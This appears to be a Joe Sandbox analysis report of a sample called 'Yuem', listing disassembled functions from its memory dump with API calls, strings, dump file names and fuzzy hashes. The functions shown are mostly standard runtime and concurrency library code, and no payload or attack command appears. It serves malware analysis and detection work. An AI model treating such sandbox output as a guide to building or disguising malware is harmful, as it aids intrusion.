Function 00D087B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00D08800
SwitchToThread.KERNEL32(?), ref: 00D08823
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00D08842
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00D0885E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00D08869
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D08890

Strings

count, xrefs: 00D087CE
ppVirtualProcessorRoots, xrefs: 00D08888

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 0d705dabf0d7db5546f7beafdf8bd227c134004cd1b1f8a8d4110af7db867f07
Instruction ID: fcf972435614d0e654be7bc6a91f03f115a4728a8a553a39127623981513b951
Opcode Fuzzy Hash: 0d705dabf0d7db5546f7beafdf8bd227c134004cd1b1f8a8d4110af7db867f07
Instruction Fuzzy Hash: CC214D34A00309AFCB14EF99D585AADBBB5FF49340F5480A9E949A7391CB30AE05DF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D0826C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00D08286
GetCurrentProcess.KERNEL32 ref: 00D0828E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00D082A3
SafeRWList.LIBCONCRT ref: 00D082C3

Part of subcall function 00D062BE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00D062CF
Part of subcall function 00D062BE: List.LIBCMT ref: 00D062D9

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D082D5
GetLastError.KERNEL32 ref: 00D082E4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00D082FA

Strings

eventObject, xrefs: 00D082CD

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: e369491a1c4f387840e098da71ef9ef5c5ec4cf9ef064748e1e6fd8c970bbfae
Instruction ID: 07172e7cbfb3432cc567af428fc374c6e1b9c707353e2ddf9e24f0cb83e40e10
Opcode Fuzzy Hash: e369491a1c4f387840e098da71ef9ef5c5ec4cf9ef064748e1e6fd8c970bbfae
Instruction Fuzzy Hash: 67110235900308EBCB14EBA4CD4AFFE33A8AB00750F204125F549E61D2DF70DA04DA79

Uniqueness

Uniqueness Score: -1.00%

Function 00D26AB2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ac733e3f1bffd790b4d48d736201b674eb1836e0f87d14c929f3fd40d11d51f
Instruction ID: 3ffc18f02c42237ee235461e20eaa7543df986e327ff2b735254f3a2c10a84d5
Opcode Fuzzy Hash: 6ac733e3f1bffd790b4d48d736201b674eb1836e0f87d14c929f3fd40d11d51f
Instruction Fuzzy Hash: C2C1EFB4E04359AFCB15DF98E880BADBBB1EF69318F144059E845AB392CB70D941CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D08D31 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00D08D53

Part of subcall function 00D07108: __EH_prolog3_catch.LIBCMT ref: 00D0710F
Part of subcall function 00D07108: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00D07148

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00D08D61

Part of subcall function 00D07D6D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00D07D92
Part of subcall function 00D07D6D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00D07DB5

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00D08D7A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00D08D86

Part of subcall function 00D07108: InterlockedPopEntrySList.KERNEL32(?), ref: 00D07191
Part of subcall function 00D07108: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00D071C0
Part of subcall function 00D07108: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00D071CE

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00D08DD2
Concurrency::location::_Assign.LIBCMT ref: 00D08DF3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00D08DFB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00D08E0D
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00D08E3D

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 5d5a4bbfb74ed34e4c07d4519c7dab76c4ca6c81b645425832ea2c9478875ab2
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 8E314730B04251AFCF16AA7888927FEBBB69F51304F080169E5CDD72C2DF255C4597B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D11DD5 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D11DEB
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00D070FE,?), ref: 00D11DFD
GetCurrentThread.KERNEL32 ref: 00D11E05
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00D070FE,?), ref: 00D11E0D
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00D070FE,?), ref: 00D11E26
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00D11E47

Part of subcall function 00D01661: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00D0167B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00D070FE,?), ref: 00D11E59
GetLastError.KERNEL32(?,?,?,?,?,00D070FE,?), ref: 00D11E84
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00D11E9A

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 320863867c5d8cf2997752f913830e582ca9c1463a1995172493c49bcf1bb8fe
Instruction ID: 4895a9b4f10280b5c4b23f59fb979c8167d5211bb98cda0b9e4915ef4a4c1469
Opcode Fuzzy Hash: 320863867c5d8cf2997752f913830e582ca9c1463a1995172493c49bcf1bb8fe
Instruction Fuzzy Hash: BC11B779A00315BBC710ABB4AD4ABEB77A8AF05740F140135FE45DA292EE70C944CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D1FE6E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00D1FE98
_free.LIBCMT ref: 00D1FF71
_free.LIBCMT ref: 00D1FF9E

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 9f814eac535bfb45e7c1f282ba914b805914f144eac72fbd01208eb3ee380c29
Instruction ID: 0c0c34451fe0fc51b88f22aac1f5ada4d5edd6507f65ff3ef89f62f2f39510a0
Opcode Fuzzy Hash: 9f814eac535bfb45e7c1f282ba914b805914f144eac72fbd01208eb3ee380c29
Instruction Fuzzy Hash: 9C51D771D48315BFEB20AF74B941BAE7FA4EF11314F184169F95097283EE7189819BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CEEAD0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

list too long, xrefs: 00CEEF8D

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 062e6c4d4c8b7c6422e3fe2a1e24efc64fdd5dedd6d38d6aab58233b8947e608
Instruction ID: 05a6b22484bd47232ce4266bc1bdb462d1250f07c5a5c7ee61b7ae3acc1d5698
Opcode Fuzzy Hash: 062e6c4d4c8b7c6422e3fe2a1e24efc64fdd5dedd6d38d6aab58233b8947e608
Instruction Fuzzy Hash: CC61CDB0D047589BDB10DF64CC49BAAF7B8EF04310F0042A9E91DA7291E771AA85DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00D15C90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D15CC7
___except_validate_context_record.LIBVCRUNTIME ref: 00D15CCF
_ValidateLocalCookies.LIBCMT ref: 00D15D58
__IsNonwritableInCurrentImage.LIBCMT ref: 00D15D83
_ValidateLocalCookies.LIBCMT ref: 00D15DD8

Strings

csm, xrefs: 00D15D6D

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cd89d269b19939f62ac18879b09f90bea0ece3f1be3879bbb33ef5469e95000b
Instruction ID: e1222a658d8d0f0d76823a23e97a63cb17aa54175b613c3af37498f14c42835f
Opcode Fuzzy Hash: cd89d269b19939f62ac18879b09f90bea0ece3f1be3879bbb33ef5469e95000b
Instruction Fuzzy Hash: 0141D434A00608FBCF10DF68F884ADEBBB1EF84314F188055E8159B366DB759985CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D12F76 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00D12F8F

Part of subcall function 00D1325E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00D12CD7), ref: 00D1326E

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00D12FA4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D12FB3
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D13077

Strings

pContext, xrefs: 00D1306F
switchState, xrefs: 00D12FAB

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: ac6060b5197dcee16a78b7992a198dafe431570cc8fdf6c4f4d3ea327308bc24
Instruction ID: c69a750e4183510e4df8169b39d88ec41a8580002cd7142e84245a0a6e047248
Opcode Fuzzy Hash: ac6060b5197dcee16a78b7992a198dafe431570cc8fdf6c4f4d3ea327308bc24
Instruction Fuzzy Hash: 0431B475A00214AFCF08EF68D9819ED73B9EF58310F244459E915A7286DF31EE568BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0FBFF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00D0FC27

Part of subcall function 00D0F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00D0F9C7
Part of subcall function 00D0F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00D0F9E9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D0FCA4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00D0FCB0
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00D0FCBF
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00D0FCC9
Concurrency::location::_Assign.LIBCMT ref: 00D0FCFD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00D0FD05

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 0239758991446a8dce30a8401001a4606fd4bff3324484a9b3b17f75a35d64fc
Instruction ID: 8b3285e8a8c3e7b0dc740e97987c42b612408148938935e250632cb006235bab
Opcode Fuzzy Hash: 0239758991446a8dce30a8401001a4606fd4bff3324484a9b3b17f75a35d64fc
Instruction Fuzzy Hash: F2412935A00208DFCB15EF64C495BADB7B5FF48300F6884A9ED499B382DB74A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1C55D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00D1C5C8
api-ms-, xrefs: 00D1C5B4

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: ac2a97cda4c322b21e58748b534689b02001e5024cf3a37dae4d93718e42f25d
Instruction ID: 57eccd3c67596544b669c697ee0e32a0a2f781a52a740c6bfaba98ab2b351554
Opcode Fuzzy Hash: ac2a97cda4c322b21e58748b534689b02001e5024cf3a37dae4d93718e42f25d
Instruction Fuzzy Hash: D421D571AA1320BBDB218B64BC45AAE77699F457A0F292110E845FB2A0DF30ED40C5F0

Uniqueness

Uniqueness Score: -1.00%

Function 00D204BB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D20483: _free.LIBCMT ref: 00D204A8

_free.LIBCMT ref: 00D20509

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

_free.LIBCMT ref: 00D20514
_free.LIBCMT ref: 00D2051F
_free.LIBCMT ref: 00D20573
_free.LIBCMT ref: 00D2057E
_free.LIBCMT ref: 00D20589
_free.LIBCMT ref: 00D20594

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: a1e5691ebfff339416bf57b5355a175d661338500d3b83a1abf2bc4e75a65841
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 3F117F719C0B14BAD520B7B0EC4BFDB7BDCDF00709F408C15B79A66053EA28B5858670

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8090 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00CFDAFC: mtx_do_lock.LIBCPMT ref: 00CFDB04

__Mtx_unlock.LIBCPMT ref: 00CF8161
std::_Rethrow_future_exception.LIBCPMT ref: 00CF81B2
std::_Rethrow_future_exception.LIBCPMT ref: 00CF81C2
__Mtx_unlock.LIBCPMT ref: 00CF8265
__Mtx_unlock.LIBCPMT ref: 00CF836B
__Mtx_unlock.LIBCPMT ref: 00CF83A6

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 9a39701fe9631455b925d2b63daacc31b7a573b253269152f8a2275ccb1e4a04
Instruction ID: 3fbb925c07d4a7729e92a0fc7b7ba6ac853acc75b644a66114435e29c4d8e7bb
Opcode Fuzzy Hash: 9a39701fe9631455b925d2b63daacc31b7a573b253269152f8a2275ccb1e4a04
Instruction Fuzzy Hash: 05C1D07190070D9BDB60DFA4C945BBEBBF5AF01300F00456DEA2697691DB71AA08DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D2109F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00CE8B40,00000000), ref: 00D210E7
__fassign.LIBCMT ref: 00D212C6
__fassign.LIBCMT ref: 00D212E3
WriteFile.KERNEL32(?,00CE8B40,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D2132B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D2136B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D21417

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 50ab03ee818e693502a09f6923a7e5a8dc70538bb84ff3834b00985cb395243f
